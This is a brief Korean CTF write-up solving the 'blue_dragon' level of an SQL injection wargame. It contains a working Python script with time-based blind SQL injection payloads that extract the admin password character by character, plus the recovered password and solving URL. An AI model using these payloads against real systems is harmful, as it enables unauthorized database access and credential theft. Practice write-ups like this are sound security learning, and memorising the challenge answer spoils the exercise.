blue_dragon

첫 화면이다.

Time-based Blind SQL Injection 문제로 인지하고 풀었다.

파이썬 코드를 짜면 아래와 같다.

import requests
import time

URL = 'https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?id='
PHPSESSID = 'MY_PHPSESSID'
SLEEP = 2


def query(payload):
    start = time.time()
    cookies = {'PHPSESSID': PHPSESSID}
    requests.post(URL + payload, cookies=cookies)
    if time.time() - start > SLEEP:
        return True
    else:
        return False


# 8
def find_pw_length():
    pw_len = 1
    while query("' or id='admin' and if(length(pw)={}, sleep({}), 0)%23".format(pw_len, SLEEP)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# d948b8a0
def find_pw():
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("' or id='admin' and if(ord(substr(pw,{},1))={}, sleep({}), 0)%23".format(pos, character, SLEEP)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()

실행결과, pw는 d948b8a0 이다.

https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?id=admin&pw=d948b8a0 에 접속하면 문제가 풀린다.